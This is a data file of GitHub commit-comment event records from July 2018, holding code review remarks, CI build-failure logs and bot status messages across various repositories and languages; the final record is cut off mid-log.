{"id":"7964073182","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704633,"position":124,"line":144,"path":"builtin/rebase.c","commit_id":"f8429e950a45abe3b78f457491e26ea913b6730b","created_at":"2018-07-13T19:58:58Z","updated_at":"2018-07-13T19:58:58Z","author_association":"NONE","body":"Could you please amend this commit with the change to prefix this with `. git sh-setup && `? Otherwise, the functions defined in `get-sh-setup` are not available, even if they are used aplenty by the rebase backends (e.g. `eval_gettext`, which is technically in `git-sh-i18n`, but that is sourced from `git-sh-setup`)."}},"created_at":"2018-07-13T19:58:58Z"}
{"id":"7964074774","type":"CommitCommentEvent","actor":{"login":"ulisescolina"},"repo":{"name":"ulisescolina/UC-SD"},"payload":{"comment":{"id":29704636,"position":null,"line":null,"path":null,"commit_id":"1655589ec2296afac9dc34f26fcd6ebc8624c0ba","created_at":"2018-07-13T19:59:20Z","updated_at":"2018-07-13T19:59:20Z","author_association":"OWNER","body":"Dr. @hectorejch este commit deja al proyecto en un estado relativamente estable, aunque estamos teniendo dos problemas:\r\n\r\n1. **java.util.ConcurrentModificationException**\r\n2. El lugar en el que almacenamos los temporizadores falta ser tratado con mejor cuidado, dado a que a veces consultamos cosas que no existen y tenemos un **NullPointerException**.\r\n\r\nMe encuentro trabajando en las dos cosas."}},"created_at":"2018-07-13T19:59:20Z"}
{"id":"7964076816","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29704638,"position":null,"line":null,"path":null,"commit_id":"025330334c823fbffbc734ff7ef47b73f7eb4744","created_at":"2018-07-13T19:59:48Z","updated_at":"2018-07-13T19:59:48Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/home/daid/_tinyci/daid/SeriousProton2/src/collision/2d/box.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/weapons/weaponFireTraceEffect.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:302: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:21:33: fatal error: dynamicSectorLoader.h: No such file or directory\n #include \"dynamicSectorLoader.h\"\n                                 ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-13T19:59:48Z"}
{"id":"7964077209","type":"CommitCommentEvent","actor":{"login":"adrianaanghelescu"},"repo":{"name":"adrianaanghelescu/scoala-informala-homework"},"payload":{"comment":{"id":29704639,"position":null,"line":null,"path":null,"commit_id":"84901891a2f2b8710f08f49da027e5464325dfa0","created_at":"2018-07-13T19:59:54Z","updated_at":"2018-07-13T19:59:54Z","author_association":"OWNER","body":"problema 2 e cea pe care am facut-o cu array si nu am reusit sa o compilez.... nu m-am priceput sa citesc elementele colectiei de numere :( => de aceea nu e incarcata"}},"created_at":"2018-07-13T19:59:54Z"}
{"id":"7959615919","type":"CommitCommentEvent","actor":{"login":"linhlc888"},"repo":{"name":"linhlc888/linhlc.github.com"},"payload":{"comment":{"id":29693606,"position":null,"line":null,"path":null,"commit_id":"bf90d3050aa521032f6541682c24de3a17036b04","created_at":"2018-07-13T02:00:55Z","updated_at":"2018-07-13T02:00:55Z","author_association":"OWNER","body":"apply Jekyll theme"}},"created_at":"2018-07-13T02:00:55Z"}
{"id":"7959616076","type":"CommitCommentEvent","actor":{"login":"cherrymaerojas"},"repo":{"name":"cherrymaerojas/hellocherry"},"payload":{"comment":{"id":29693607,"position":null,"line":null,"path":null,"commit_id":"df4c1f338c993ac3e3ea2aed202ae008aa533a76","created_at":"2018-07-13T02:00:58Z","updated_at":"2018-07-13T02:00:58Z","author_association":"OWNER","body":"okey"}},"created_at":"2018-07-13T02:00:58Z"}
{"id":"7959630192","type":"CommitCommentEvent","actor":{"login":"2512500960"},"repo":{"name":"2512500960/zzu-minieap"},"payload":{"comment":{"id":29693624,"position":null,"line":null,"path":null,"commit_id":"101a4dc30020029666395fadef64d17876527a5e","created_at":"2018-07-13T02:06:29Z","updated_at":"2018-07-13T02:06:29Z","author_association":"OWNER","body":"mipsel架构编译问题，解决cannnot detect CPU archtitecture"}},"created_at":"2018-07-13T02:06:29Z"}
{"id":"7959632516","type":"CommitCommentEvent","actor":{"login":"zgg548"},"repo":{"name":"zgg548/Codes"},"payload":{"comment":{"id":29693629,"position":null,"line":null,"path":null,"commit_id":"ca476014141694c54bd8bdd80c5f3b8fc5d5077d","created_at":"2018-07-13T02:07:30Z","updated_at":"2018-07-13T02:07:30Z","author_association":"OWNER","body":"这里面是我写的所有的代码"}},"created_at":"2018-07-13T02:07:30Z"}
{"id":"7959642265","type":"CommitCommentEvent","actor":{"login":"Ir1d"},"repo":{"name":"cjsoft/cjsoft.github.io"},"payload":{"comment":{"id":29693644,"position":null,"line":null,"path":null,"commit_id":"e6bb98f8ffe2ce186e40523379c6ceb2677bf6a5","created_at":"2018-07-13T02:11:24Z","updated_at":"2018-07-13T02:11:24Z","author_association":"NONE","body":"https://github.com/lrinQVQ/script 了解一下"}},"created_at":"2018-07-13T02:11:24Z"}
{"id":"7959644395","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29693646,"position":null,"line":null,"path":null,"commit_id":"75adb5e4107eeb0825b1a726f6582f3659b211e1","created_at":"2018-07-13T02:12:15Z","updated_at":"2018-07-13T02:12:15Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/75adb5e4107eeb0825b1a726f6582f3659b211e1/index.html"}},"created_at":"2018-07-13T02:12:15Z"}
{"id":"7959648783","type":"CommitCommentEvent","actor":{"login":"charlietag"},"repo":{"name":"rvm/rvm"},"payload":{"comment":{"id":29693653,"position":4,"line":215,"path":"scripts/functions/environment","commit_id":"3d9b93b3ce1a0651c3c7cc23193957f619f65fd9","created_at":"2018-07-13T02:14:03Z","updated_at":"2018-07-13T02:14:03Z","author_association":"NONE","body":"Please add the following above this line:\r\ntrap >/dev/null\r\nOtherwise (trap) will always get the following result:\r\ntrap -- '' SIGINT\r\ntrap -- '' SIGQUIT\r\nThis means.... INT QUIT (__rvm_grep) will always be trapped.\r\nThis means... My ctrl+c will always be blocked....\r\n\r\nThanks for your effort\r\n"}},"created_at":"2018-07-13T02:14:03Z"}
{"id":"7959650819","type":"CommitCommentEvent","actor":{"login":"charlietag"},"repo":{"name":"rvm/rvm"},"payload":{"comment":{"id":29693659,"position":4,"line":215,"path":"scripts/functions/environment","commit_id":"3d9b93b3ce1a0651c3c7cc23193957f619f65fd9","created_at":"2018-07-13T02:14:51Z","updated_at":"2018-07-13T02:14:51Z","author_association":"NONE","body":"<pre>\r\ntrap >/dev/null\r\n_rvm_old_traps=$( __rvm_grep -E 'EXIT|HUP|INT|QUIT|TERM' <(trap) )\r\n</pre>"}},"created_at":"2018-07-13T02:14:51Z"}
{"id":"7959658836","type":"CommitCommentEvent","actor":{"login":"seoayoung"},"repo":{"name":"ITkim/bigData"},"payload":{"comment":{"id":29693678,"position":null,"line":null,"path":null,"commit_id":"ce15b1f2c9922a417d05c34a20933c5181b31b9d","created_at":"2018-07-13T02:17:52Z","updated_at":"2018-07-13T02:17:52Z","author_association":"COLLABORATOR","body":"서아영"}},"created_at":"2018-07-13T02:17:52Z"}
{"id":"7959667254","type":"CommitCommentEvent","actor":{"login":"Llldmiao"},"repo":{"name":"Llldmiao/float-position"},"payload":{"comment":{"id":29693694,"position":1,"line":1,"path":"README.md","commit_id":"6c74c62333ca4462f5229672bcd5111108fe4773","created_at":"2018-07-13T02:21:07Z","updated_at":"2018-07-13T02:21:07Z","author_association":"OWNER","body":"position有四个属性（static、relative、absolute）\r\n1、relative  设置了相对定位属性的元素特点\r\n（1）只设置相对定位，不设置位移时，定位后的元素位置和定位之前的元素位置不会有任何变化\r\n（2）元素移动后，元素的原始位置会被保留下来（不脱离文档流）\r\n（3）元素相对定位后会提升层级\r\n（4）相对定位的元素根据自身的原始位置计算位移值"}},"created_at":"2018-07-13T02:21:07Z"}
{"id":"7959668812","type":"CommitCommentEvent","actor":{"login":"zhanght8023"},"repo":{"name":"zhanght8023/8888"},"payload":{"comment":{"id":29693695,"position":null,"line":null,"path":null,"commit_id":"f5fd7c456dc06475e5e5e8557312bd7771dfd893","created_at":"2018-07-13T02:21:38Z","updated_at":"2018-07-13T02:21:38Z","author_association":"OWNER","body":"1\r\n"}},"created_at":"2018-07-13T02:21:38Z"}
{"id":"7959688078","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693730,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-13T02:29:16Z","updated_at":"2018-07-13T02:29:16Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T02:29:16Z"}
{"id":"7959689112","type":"CommitCommentEvent","actor":{"login":"ldhasson"},"repo":{"name":"CapsicoHealth/Tilda"},"payload":{"comment":{"id":29693731,"position":null,"line":null,"path":null,"commit_id":"2c04b1b3b70b8b8e6a17e4ce6864b1b37021e838","created_at":"2018-07-13T02:29:39Z","updated_at":"2018-07-13T02:29:39Z","author_association":"CONTRIBUTOR","body":":)\r\n"}},"created_at":"2018-07-13T02:29:39Z"}
{"id":"7959692229","type":"CommitCommentEvent","actor":{"login":"techAPJ"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29693743,"position":6,"line":1226,"path":"app/models/user.rb","commit_id":"7550e9ff958d13465d0382f6daab193ff5eda7fb","created_at":"2018-07-13T02:30:48Z","updated_at":"2018-07-13T02:30:48Z","author_association":"MEMBER","body":"Oops, good catch. Fixed in https://github.com/discourse/discourse/commit/db67c87916a54f1f8a061bca8932e5ae06af4ed4."}},"created_at":"2018-07-13T02:30:48Z"}
{"id":"7959695330","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693749,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T02:32:05Z","updated_at":"2018-07-13T02:32:05Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2936 of 2937 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T02:32:05Z"}
{"id":"7959696216","type":"CommitCommentEvent","actor":{"login":"FilipeSilvens"},"repo":{"name":"LWSS/Fuzion"},"payload":{"comment":{"id":29693751,"position":null,"line":null,"path":null,"commit_id":"5c952920765e518af23f7b712ccb06b393042c2d","created_at":"2018-07-13T02:32:27Z","updated_at":"2018-07-13T02:32:27Z","author_association":"NONE","body":"much love, thank you <3"}},"created_at":"2018-07-13T02:32:27Z"}
{"id":"7959698119","type":"CommitCommentEvent","actor":{"login":"JCMais"},"repo":{"name":"getinsomnia/node-libcurl"},"payload":{"comment":{"id":29693753,"position":null,"line":null,"path":null,"commit_id":"55bf924081c39bf1e2fde2fa1aa721167304c3a1","created_at":"2018-07-13T02:33:12Z","updated_at":"2018-07-13T02:33:12Z","author_association":"NONE","body":"would you mind opening a PR for this? "}},"created_at":"2018-07-13T02:33:12Z"}
{"id":"7959701246","type":"CommitCommentEvent","actor":{"login":"ghanshyammann"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29693757,"position":5,"line":32,"path":"prow/plugins/approve/approvers/owners_test.go","commit_id":"6e919d224f8ef6f3ad3c98eaef77685d240e9bae","created_at":"2018-07-13T02:34:24Z","updated_at":"2018-07-13T02:34:24Z","author_association":"NONE","body":"you are changing the snake_case to camelCase. snake_case is more readbale. what is recommended one for k8s? is there any guide/doc suggest about using  camelCase over snake_case"}},"created_at":"2018-07-13T02:34:24Z"}
{"id":"7959703582","type":"CommitCommentEvent","actor":{"login":"ghanshyammann"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29693760,"position":null,"line":null,"path":null,"commit_id":"6e919d224f8ef6f3ad3c98eaef77685d240e9bae","created_at":"2018-07-13T02:35:22Z","updated_at":"2018-07-13T02:35:22Z","author_association":"NONE","body":"you are changing the snake_case to camelCase. snake_case is more readable. what is recommended one for k8s? is there any guide/doc suggest about using  camelCase over snake_case"}},"created_at":"2018-07-13T02:35:22Z"}
{"id":"7959706210","type":"CommitCommentEvent","actor":{"login":"Krishnakuram"},"repo":{"name":"Krishnakuram/HelloSprigTest"},"payload":{"comment":{"id":29693763,"position":null,"line":null,"path":null,"commit_id":"be182a10f15d08ee4102d25d93e26ffc098e64fb","created_at":"2018-07-13T02:36:31Z","updated_at":"2018-07-13T02:36:31Z","author_association":"OWNER","body":"Third level"}},"created_at":"2018-07-13T02:36:31Z"}
{"id":"7959708049","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29693769,"position":null,"line":null,"path":null,"commit_id":"b21988b242db6bdb84d12f88dc5e97e6cb25d7e9","created_at":"2018-07-13T02:37:17Z","updated_at":"2018-07-13T02:37:17Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n指摘事項\r\n1　ログイン処理は、「SELECT」をする際に「WHERE句」でIDとPASSWORDを指定してデータを取得すようにしましょう。\r\n　このままですと、処理がかなり重くなり、画面を表示されるまでに膨大な時間がかかります。\r\n2　phpの「exit;」はどこで処理が終了しているか、なぜ終了しているか、が分からないので使用せず、if文などで処理を分岐するようにしましょう。\r\n3　全体的にコメントが少ないです。処理の意図を明確するためにコメントはしっかり書きましょう。"}},"created_at":"2018-07-13T02:37:17Z"}
{"id":"7959713324","type":"CommitCommentEvent","actor":{"login":"Mons"},"repo":{"name":"okoshovetc/config"},"payload":{"comment":{"id":29693773,"position":15,"line":226,"path":"config.lua","commit_id":"8898659568eed9e4b105f1ddac7d2cc2d818ab5f","created_at":"2018-07-13T02:39:26Z","updated_at":"2018-07-13T02:39:26Z","author_association":"NONE","body":"тогда уж `not not next(...)`"}},"created_at":"2018-07-13T02:39:26Z"}
{"id":"7959715043","type":"CommitCommentEvent","actor":{"login":"Mons"},"repo":{"name":"okoshovetc/config"},"payload":{"comment":{"id":29693775,"position":7,"line":218,"path":"config.lua","commit_id":"8898659568eed9e4b105f1ddac7d2cc2d818ab5f","created_at":"2018-07-13T02:40:11Z","updated_at":"2018-07-13T02:40:11Z","author_association":"NONE","body":"не надо `ipairs`, лучше `pairs`"}},"created_at":"2018-07-13T02:40:11Z"}
{"id":"7959724673","type":"CommitCommentEvent","actor":{"login":"wfyihai"},"repo":{"name":"KieSun/Front-end-knowledge"},"payload":{"comment":{"id":29693782,"position":null,"line":null,"path":null,"commit_id":"af987c25ba3b36d404a132cd0fe8786f88546f27","created_at":"2018-07-13T02:44:00Z","updated_at":"2018-07-13T02:44:00Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-13T02:44:00Z"}
{"id":"7959728465","type":"CommitCommentEvent","actor":{"login":"vbrrt"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29693792,"position":36,"line":90,"path":"app/src/main/java/com/example/android/miwok/WordAdapter.java","commit_id":"adf90d17fa802b2b5229d29faebee4b3991017b1","created_at":"2018-07-13T02:45:23Z","updated_at":"2018-07-13T02:45:23Z","author_association":"NONE","body":"Where is the \"text_container\" defined?\r\n"}},"created_at":"2018-07-13T02:45:23Z"}
{"id":"7959729088","type":"CommitCommentEvent","actor":{"login":"Mons"},"repo":{"name":"okoshovetc/config"},"payload":{"comment":{"id":29693794,"position":55,"line":350,"path":"config.lua","commit_id":"8898659568eed9e4b105f1ddac7d2cc2d818ab5f","created_at":"2018-07-13T02:45:37Z","updated_at":"2018-07-13T02:45:37Z","author_association":"NONE","body":"ох, хорош.\r\nуговорил на отдельную ветку if'а..."}},"created_at":"2018-07-13T02:45:37Z"}
{"id":"7959736016","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29693802,"position":null,"line":null,"path":null,"commit_id":"09fb327a5f87a092fe628a00287514aaa33572b9","created_at":"2018-07-13T02:48:25Z","updated_at":"2018-07-13T02:48:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T02:48:25Z"}
{"id":"7959738980","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/pyret-lang"},"payload":{"comment":{"id":29693804,"position":null,"line":null,"path":null,"commit_id":"905def3a4c0d7c687602d259c6c81928a54d6e60","created_at":"2018-07-13T02:49:30Z","updated_at":"2018-07-13T02:49:30Z","author_association":"MEMBER","body":"@blerner have a look at this one. The bottom few tests weren't passing because they used `*,` which lexed as `BAD-OPER`. Wonder if there's a more elegant solution to the lexing problem."}},"created_at":"2018-07-13T02:49:30Z"}
{"id":"7959741944","type":"CommitCommentEvent","actor":{"login":"MeechySwazi"},"repo":{"name":"MeechySwazi/HELLO-WORLD"},"payload":{"comment":{"id":29693806,"position":2,"line":2,"path":"README.md","commit_id":"1182afed46f94bdb793a975569b2c95e725fc13c","created_at":"2018-07-13T02:50:37Z","updated_at":"2018-07-13T02:50:37Z","author_association":"OWNER","body":"WHAT A WONDERFUL WORLD\r\n"}},"created_at":"2018-07-13T02:50:37Z"}
{"id":"7959742894","type":"CommitCommentEvent","actor":{"login":"luyao1991"},"repo":{"name":"luyao1991/my_code_17tec"},"payload":{"comment":{"id":29693810,"position":null,"line":null,"path":null,"commit_id":"4e1257b9f26310106fa29906d864fe64a46acd4b","created_at":"2018-07-13T02:50:59Z","updated_at":"2018-07-13T02:50:59Z","author_association":"OWNER","body":"试验成功，不会上传.idea,venv文件了"}},"created_at":"2018-07-13T02:50:59Z"}
{"id":"7959743577","type":"CommitCommentEvent","actor":{"login":"516352105"},"repo":{"name":"516352105/study-code"},"payload":{"comment":{"id":29693812,"position":null,"line":null,"path":null,"commit_id":"f3b9ddb4aa392dc32466c783015be751db9f04ae","created_at":"2018-07-13T02:51:16Z","updated_at":"2018-07-13T02:51:16Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-13T02:51:16Z"}
{"id":"7959749862","type":"CommitCommentEvent","actor":{"login":"516352105"},"repo":{"name":"516352105/study-code"},"payload":{"comment":{"id":29693825,"position":null,"line":null,"path":null,"commit_id":"f3b9ddb4aa392dc32466c783015be751db9f04ae","created_at":"2018-07-13T02:53:46Z","updated_at":"2018-07-13T02:53:46Z","author_association":"OWNER","body":"456"}},"created_at":"2018-07-13T02:53:46Z"}
{"id":"7959752194","type":"CommitCommentEvent","actor":{"login":"tracyshen"},"repo":{"name":"Bytom-Community/Bytom-Server"},"payload":{"comment":{"id":29693829,"position":162,"line":219,"path":"api/query.go","commit_id":"8c11322ef26db33de8a3cce2ff197340d9aa2c7d","created_at":"2018-07-13T02:54:41Z","updated_at":"2018-07-13T02:54:41Z","author_association":"COLLABORATOR","body":"优化查询，使用union"}},"created_at":"2018-07-13T02:54:41Z"}
{"id":"7959757162","type":"CommitCommentEvent","actor":{"login":"Tswings"},"repo":{"name":"Tswings/test"},"payload":{"comment":{"id":29693835,"position":2,"line":1,"path":"README.md","commit_id":"d711b1cbbee27cec04fc907991922dc3bd04046a","created_at":"2018-07-13T02:56:36Z","updated_at":"2018-07-13T02:56:36Z","author_association":"OWNER","body":"flag"}},"created_at":"2018-07-13T02:56:36Z"}
{"id":"7959763271","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/pyret-lang"},"payload":{"comment":{"id":29694030,"position":null,"line":null,"path":null,"commit_id":"905def3a4c0d7c687602d259c6c81928a54d6e60","created_at":"2018-07-13T02:58:58Z","updated_at":"2018-07-13T02:58:58Z","author_association":"MEMBER","body":"This is a rather annoying difficulty.  We could separate out `*` from BAD-OPER, in a similar way to separating LANGLE from GT.  But I've found a few very brittle edge cases for LANGLE and GT too (in type-instantiation settings, mostly), which makes me leery of yet more whitespace-sensitive tokenizations.\r\n\r\nI *think* you could:\r\n1) Rename the `STAR` token to `TIMES`\r\n2) split off `*` from BAD-OPER, make it be `{name: \"STAR\", val: \"*\"}`\r\n3) change parse-pyret.js to look for BAD-OPER or STAR tokens\r\n4) use this new STAR token for the include productions, and change all existing uses of STAR to TIMES.\r\n\r\nI don't have a better answer than this, right now..."}},"created_at":"2018-07-13T02:58:58Z"}
{"id":"7959765815","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29694036,"position":null,"line":null,"path":null,"commit_id":"c7864aa6b0e88d62cac7fbf5e60f95977a151f48","created_at":"2018-07-13T02:59:57Z","updated_at":"2018-07-13T02:59:57Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Restrict ssh access](https://trello.com/c/qe9e0TUe/60-restrict-ssh-access)"}},"created_at":"2018-07-13T02:59:57Z"}
{"id":"7964079559","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-website"},"payload":{"comment":{"id":29704650,"position":null,"line":null,"path":null,"commit_id":"95621ed6bdcd65b3408208c3e738bb6d514d08a6","created_at":"2018-07-13T20:00:24Z","updated_at":"2018-07-13T20:00:24Z","author_association":"OWNER","body":"What are your thoughts to going this route with the blog.md content? @rakyll\r\n![screen shot 2018-07-13 at 2 52 28 pm](https://user-images.githubusercontent.com/35931163/42711375-3fd53d44-86ad-11e8-991b-f65e1284288c.png)\r\n"}},"created_at":"2018-07-13T20:00:24Z"}
{"id":"7964079673","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29704651,"position":null,"line":null,"path":null,"commit_id":"416a22b8982ed988710940d4c8b3ce4f28de61a7","created_at":"2018-07-13T20:00:26Z","updated_at":"2018-07-13T20:00:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-366](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-366).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-366-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T20:00:26Z"}
{"id":"7964079818","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704652,"position":21,"line":220,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:00:28Z","updated_at":"2018-07-13T20:00:28Z","author_association":"NONE","body":"You still need to call mrail_free..."}},"created_at":"2018-07-13T20:00:28Z"}
{"id":"7964082440","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704661,"position":46,"line":259,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:01:03Z","updated_at":"2018-07-13T20:01:03Z","author_association":"NONE","body":"You should never get a completion for remote read"}},"created_at":"2018-07-13T20:01:03Z"}
{"id":"7964082563","type":"CommitCommentEvent","actor":{"login":"rhoggSugarcrm"},"repo":{"name":"yli-sugarcrm/handlebars.js"},"payload":{"comment":{"id":29704662,"position":8,"line":8,"path":"WARNING","commit_id":"d340f8e754d558fe4d76c1ab7c942fd26b38d4ad","created_at":"2018-07-13T20:01:05Z","updated_at":"2018-07-13T20:01:05Z","author_association":"NONE","body":"Can you say \"outside of\"? Sorry, my original warning in the README had this typo too but I corrected it without saying."}},"created_at":"2018-07-13T20:01:05Z"}
{"id":"7964086114","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704678,"position":50,"line":288,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:01:53Z","updated_at":"2018-07-13T20:01:53Z","author_association":"OWNER","body":"Yes. Originally, Arun had it as a macro because we had two separate counters: tx_rail and rx_rail. But now that we are using buffered recvs, I don't think we need rx_rail anymore."}},"created_at":"2018-07-13T20:01:53Z"}
{"id":"7964089933","type":"CommitCommentEvent","actor":{"login":"forax"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29704686,"position":null,"line":null,"path":null,"commit_id":"fa6362f5c3e016788e7d557cace8d682d7b51c5c","created_at":"2018-07-13T20:02:48Z","updated_at":"2018-07-13T20:02:48Z","author_association":"OWNER","body":"my plan is more to use openjdk11 and oraclejdk11 as base and jdk12 as early access, after all, soon the jdk 10 will be obsolete\r\nfor oraclejdk12, as far as i understand, it's not published yet but will be published soon, so allow_failures seem the right way to deal with that"}},"created_at":"2018-07-13T20:02:48Z"}
{"id":"7964090340","type":"CommitCommentEvent","actor":{"login":"jiekang"},"repo":{"name":"aptmac/fabric8-ui"},"payload":{"comment":{"id":29704687,"position":44,"line":72,"path":"src/app/dashboard-widgets/work-item-widget/work-item-widget.component.ts","commit_id":"c38275644cc1fda720cc01f1f16e7f6294798ba5","created_at":"2018-07-13T20:02:53Z","updated_at":"2018-07-13T20:02:53Z","author_association":"NONE","body":"I'm actually half joking. I think it might be looked down on. I think it's funny."}},"created_at":"2018-07-13T20:02:53Z"}
{"id":"7964094256","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29704697,"position":null,"line":null,"path":null,"commit_id":"8a383eeced4c82243da2d2562b35448c209c945b","created_at":"2018-07-13T20:03:43Z","updated_at":"2018-07-13T20:03:43Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 10%] Built target box2d\n[ 10%] Built target glew\n[ 16%] Built target lua\n[ 44%] Built target sp2freetype\n[ 75%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/dynamicSectorLoader.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:494: recipe for target 'CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o' failed\nCMakeFiles/Fuseblaze.dir/build.make:326: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/sectorLoader.cpp:7:21: fatal error: winsock.h: No such file or directory\n #include <winsock.h>\n                     ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:26:18: error: 'virtual void ShadowRenderPass::render(sp::P<sp::GraphicsLayer>, float)' marked 'override', but does not override\n     virtual void render(sp::P<sp::GraphicsLayer> layer, float aspect_ratio) override\n                  ^~~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h: In constructor 'ShadowRenderPass::ShadowRenderPass(sp::P<sp::Scene>, sp::P<sp::Camera>)':\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 